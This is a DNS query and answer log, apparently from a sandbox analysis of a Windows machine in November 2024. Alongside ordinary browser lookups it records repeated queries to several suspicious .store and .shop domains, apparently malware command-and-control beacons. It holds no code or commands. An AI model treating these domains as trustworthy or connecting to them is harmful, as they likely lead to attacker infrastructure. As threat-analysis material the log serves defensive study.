Nov 5, 2024 18:46:49.932126045 CET	192.168.2.4	1.1.1.1	0x85af	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.936980963 CET	192.168.2.4	1.1.1.1	0xe09f	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Nov 5, 2024 18:46:49.939229012 CET	192.168.2.4	1.1.1.1	0xbd75	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.951862097 CET	192.168.2.4	1.1.1.1	0x87d4	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 5, 2024 18:47:02.286298037 CET	192.168.2.4	1.1.1.1	0x2f29	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:02.286746025 CET	192.168.2.4	1.1.1.1	0xbf69	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false
Nov 5, 2024 18:47:03.939726114 CET	192.168.2.4	1.1.1.1	0xf53c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:03.940212011 CET	192.168.2.4	1.1.1.1	0xc86f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 5, 2024 18:47:05.112869024 CET	192.168.2.4	1.1.1.1	0x2819	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 5, 2024 18:47:05.122710943 CET	192.168.2.4	1.1.1.1	0x402b	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.180088043 CET	192.168.2.4	1.1.1.1	0xd41f	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Nov 5, 2024 18:47:05.208167076 CET	192.168.2.4	1.1.1.1	0xd132	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 5, 2024 18:47:05.242398024 CET	192.168.2.4	1.1.1.1	0x66ef	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.251301050 CET	192.168.2.4	1.1.1.1	0x9e8	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.255302906 CET	192.168.2.4	1.1.1.1	0x297e	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 5, 2024 18:47:05.260246992 CET	192.168.2.4	1.1.1.1	0x9364	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.341114044 CET	192.168.2.4	1.1.1.1	0x6d1	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 5, 2024 18:47:05.387927055 CET	192.168.2.4	1.1.1.1	0xc663	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.394283056 CET	192.168.2.4	1.1.1.1	0x8a44	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.404170036 CET	192.168.2.4	1.1.1.1	0xc56c	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.430669069 CET	192.168.2.4	1.1.1.1	0xbb4d	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 5, 2024 18:47:05.546741009 CET	192.168.2.4	1.1.1.1	0xa781	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.558181047 CET	192.168.2.4	1.1.1.1	0x1a46	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.581041098 CET	192.168.2.4	1.1.1.1	0xcb34	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 5, 2024 18:47:05.874413013 CET	192.168.2.4	1.1.1.1	0x4a0b	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.874531984 CET	192.168.2.4	1.1.1.1	0x6669	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Nov 5, 2024 18:47:06.218184948 CET	192.168.2.4	1.1.1.1	0x41cf	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:06.226283073 CET	192.168.2.4	1.1.1.1	0x681c	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 5, 2024 18:47:07.162760973 CET	192.168.2.4	1.1.1.1	0xe516	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:07.163002014 CET	192.168.2.4	1.1.1.1	0x8e3e	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Nov 5, 2024 18:47:08.249358892 CET	192.168.2.4	1.1.1.1	0x5a2a	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.277786970 CET	192.168.2.4	1.1.1.1	0xc388	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.307763100 CET	192.168.2.4	1.1.1.1	0xe190	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.332732916 CET	192.168.2.4	1.1.1.1	0x16b3	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.364125967 CET	192.168.2.4	1.1.1.1	0x4ec0	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.937895060 CET	192.168.2.4	1.1.1.1	0x81d4	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.953690052 CET	192.168.2.4	1.1.1.1	0x8fbe	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.962269068 CET	192.168.2.4	1.1.1.1	0x138d	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 5, 2024 18:47:09.197057009 CET	192.168.2.4	1.1.1.1	0x874a	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.197057009 CET	192.168.2.4	1.1.1.1	0x78c7	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.197251081 CET	192.168.2.4	1.1.1.1	0x2667	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.209043026 CET	192.168.2.4	1.1.1.1	0x1d85	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.209430933 CET	192.168.2.4	1.1.1.1	0x310	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.209693909 CET	192.168.2.4	1.1.1.1	0x3608	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.222481966 CET	192.168.2.4	1.1.1.1	0xa002	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Nov 5, 2024 18:47:09.223308086 CET	192.168.2.4	1.1.1.1	0x7a47	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Nov 5, 2024 18:47:09.223869085 CET	192.168.2.4	1.1.1.1	0x71ce	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Nov 5, 2024 18:47:09.240029097 CET	192.168.2.4	1.1.1.1	0x323e	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.240520000 CET	192.168.2.4	1.1.1.1	0xda9c	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.253139019 CET	192.168.2.4	1.1.1.1	0x1570	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.253696918 CET	192.168.2.4	1.1.1.1	0xdd8e	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.273411989 CET	192.168.2.4	1.1.1.1	0x1cfc	Standard query (0)	twitter.com	28	IN (0x0001)	false
Nov 5, 2024 18:47:09.278186083 CET	192.168.2.4	1.1.1.1	0x18f2	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Nov 5, 2024 18:47:11.079534054 CET	192.168.2.4	1.1.1.1	0x2941	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:11.096951008 CET	192.168.2.4	1.1.1.1	0x306	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 18:46:22.075680017 CET	1.1.1.1	192.168.2.4	0xd897	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.105868101 CET	1.1.1.1	192.168.2.4	0x7b4f	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.166374922 CET	1.1.1.1	192.168.2.4	0xcf2d	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.300774097 CET	1.1.1.1	192.168.2.4	0x506a	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.519988060 CET	1.1.1.1	192.168.2.4	0x53f3	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.641699076 CET	1.1.1.1	192.168.2.4	0xb53	No error (0)	founpiuer.store		104.21.5.155	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.641699076 CET	1.1.1.1	192.168.2.4	0xb53	No error (0)	founpiuer.store		172.67.133.135	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:35.783565998 CET	1.1.1.1	192.168.2.4	0x8ac7	No error (0)	worddosofrm.shop		104.21.16.142	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:35.783565998 CET	1.1.1.1	192.168.2.4	0x8ac7	No error (0)	worddosofrm.shop		172.67.212.246	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:37.564595938 CET	1.1.1.1	192.168.2.4	0xb8a	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:37.647336960 CET	1.1.1.1	192.168.2.4	0xd36e	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:37.908018112 CET	1.1.1.1	192.168.2.4	0x5c28	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:37.956238985 CET	1.1.1.1	192.168.2.4	0x596f	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:38.040755033 CET	1.1.1.1	192.168.2.4	0xd9b	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:38.596250057 CET	1.1.1.1	192.168.2.4	0x8bd5	No error (0)	www.google.com		142.250.186.100	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:38.596851110 CET	1.1.1.1	192.168.2.4	0x78c	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 5, 2024 18:46:42.730896950 CET	1.1.1.1	192.168.2.4	0xb32c	No error (0)	www.google.com		216.58.206.36	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:42.732029915 CET	1.1.1.1	192.168.2.4	0x6fb2	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 5, 2024 18:46:42.868966103 CET	1.1.1.1	192.168.2.4	0x4614	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:42.887182951 CET	1.1.1.1	192.168.2.4	0xeab9	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:47.592856884 CET	1.1.1.1	192.168.2.4	0xbd7	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:46:47.592856884 CET	1.1.1.1	192.168.2.4	0xbd7	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:47.593132019 CET	1.1.1.1	192.168.2.4	0xc8e2	No error (0)	youtube.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:47.722700119 CET	1.1.1.1	192.168.2.4	0xa828	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:47.723965883 CET	1.1.1.1	192.168.2.4	0x996	No error (0)	youtube.com		216.58.212.174	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:47.751066923 CET	1.1.1.1	192.168.2.4	0x91b3	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Nov 5, 2024 18:46:47.820029020 CET	1.1.1.1	192.168.2.4	0xad9d	No error (0)	youtube.com			28	IN (0x0001)	false
Nov 5, 2024 18:46:49.751837969 CET	1.1.1.1	192.168.2.4	0x9c60	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.752271891 CET	1.1.1.1	192.168.2.4	0xd784	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.752271891 CET	1.1.1.1	192.168.2.4	0xd784	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.916307926 CET	1.1.1.1	192.168.2.4	0x8db5	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.934012890 CET	1.1.1.1	192.168.2.4	0xa59	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.938194036 CET	1.1.1.1	192.168.2.4	0xcc62	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:46:49.938194036 CET	1.1.1.1	192.168.2.4	0xcc62	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.939338923 CET	1.1.1.1	192.168.2.4	0x85af	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:46:49.939338923 CET	1.1.1.1	192.168.2.4	0x85af	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.950584888 CET	1.1.1.1	192.168.2.4	0xbd75	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:02.295633078 CET	1.1.1.1	192.168.2.4	0x2f29	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:02.296847105 CET	1.1.1.1	192.168.2.4	0xbf69	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:03.946742058 CET	1.1.1.1	192.168.2.4	0xf53c	No error (0)	www.google.com		216.58.206.36	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:03.948019981 CET	1.1.1.1	192.168.2.4	0xc86f	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 5, 2024 18:47:05.132014036 CET	1.1.1.1	192.168.2.4	0x402b	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.132014036 CET	1.1.1.1	192.168.2.4	0x402b	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.230277061 CET	1.1.1.1	192.168.2.4	0x111	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.230277061 CET	1.1.1.1	192.168.2.4	0x111	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.249823093 CET	1.1.1.1	192.168.2.4	0x66ef	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.258358002 CET	1.1.1.1	192.168.2.4	0x9e8	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.258358002 CET	1.1.1.1	192.168.2.4	0x9e8	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.258358002 CET	1.1.1.1	192.168.2.4	0x9e8	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.268076897 CET	1.1.1.1	192.168.2.4	0x9364	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.348262072 CET	1.1.1.1	192.168.2.4	0x6d1	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Nov 5, 2024 18:47:05.401375055 CET	1.1.1.1	192.168.2.4	0x8a44	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.407994032 CET	1.1.1.1	192.168.2.4	0xc663	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.413599968 CET	1.1.1.1	192.168.2.4	0xc56c	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.532979965 CET	1.1.1.1	192.168.2.4	0x3e52	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.532979965 CET	1.1.1.1	192.168.2.4	0x3e52	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.554516077 CET	1.1.1.1	192.168.2.4	0xa781	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.554516077 CET	1.1.1.1	192.168.2.4	0xa781	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.568015099 CET	1.1.1.1	192.168.2.4	0x1a46	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.881591082 CET	1.1.1.1	192.168.2.4	0x4a0b	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.881591082 CET	1.1.1.1	192.168.2.4	0x4a0b	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.881591082 CET	1.1.1.1	192.168.2.4	0x4a0b	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.881591082 CET	1.1.1.1	192.168.2.4	0x4a0b	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:05.883681059 CET	1.1.1.1	192.168.2.4	0x4ec5	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.883691072 CET	1.1.1.1	192.168.2.4	0x6669	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.883691072 CET	1.1.1.1	192.168.2.4	0x6669	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.885086060 CET	1.1.1.1	192.168.2.4	0x488f	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.885086060 CET	1.1.1.1	192.168.2.4	0x488f	No error (0)	shed.dual-low.s-part-0039.t-0009.t-msedge.net	s-part-0039.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:05.885086060 CET	1.1.1.1	192.168.2.4	0x488f	No error (0)	s-part-0039.t-0009.t-msedge.net		13.107.246.67	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:06.216639042 CET	1.1.1.1	192.168.2.4	0x3121	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:06.224940062 CET	1.1.1.1	192.168.2.4	0x41cf	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:07.027244091 CET	1.1.1.1	192.168.2.4	0x4f61	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:07.027244091 CET	1.1.1.1	192.168.2.4	0x4f61	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:07.027244091 CET	1.1.1.1	192.168.2.4	0x4f61	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:07.027255058 CET	1.1.1.1	192.168.2.4	0x1a56	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:07.116520882 CET	1.1.1.1	192.168.2.4	0x6c87	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:07.170655966 CET	1.1.1.1	192.168.2.4	0xe516	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:07.170655966 CET	1.1.1.1	192.168.2.4	0xe516	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:07.170655966 CET	1.1.1.1	192.168.2.4	0xe516	No error (0)	shed.dual-low.s-part-0032.t-0009.t-msedge.net	azurefd-t-fb-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:07.170655966 CET	1.1.1.1	192.168.2.4	0xe516	No error (0)	dual.s-part-0044.t-0009.fb-t-msedge.net	s-part-0044.t-0009.fb-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:07.170655966 CET	1.1.1.1	192.168.2.4	0xe516	No error (0)	s-part-0044.t-0009.fb-t-msedge.net		13.107.253.72	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:07.171652079 CET	1.1.1.1	192.168.2.4	0x8e3e	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:07.171652079 CET	1.1.1.1	192.168.2.4	0x8e3e	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:08.272088051 CET	1.1.1.1	192.168.2.4	0x5a2a	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.300416946 CET	1.1.1.1	192.168.2.4	0xc388	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.330672026 CET	1.1.1.1	192.168.2.4	0xe190	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.355129957 CET	1.1.1.1	192.168.2.4	0x16b3	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.387362003 CET	1.1.1.1	192.168.2.4	0x4ec0	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.945202112 CET	1.1.1.1	192.168.2.4	0x81d4	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:08.945202112 CET	1.1.1.1	192.168.2.4	0x81d4	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:08.945202112 CET	1.1.1.1	192.168.2.4	0x81d4	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:08.961568117 CET	1.1.1.1	192.168.2.4	0x8fbe	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204348087 CET	1.1.1.1	192.168.2.4	0x874a	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204348087 CET	1.1.1.1	192.168.2.4	0x874a	No error (0)	star-mini.c10r.facebook.com		157.240.252.35	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204643011 CET	1.1.1.1	192.168.2.4	0x2667	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204643011 CET	1.1.1.1	192.168.2.4	0x2667	No error (0)	dyna.wikimedia.org		185.15.59.224	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:47:09.204653978 CET	1.1.1.1	192.168.2.4	0x78c7	No error (0)	youtube-ui.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
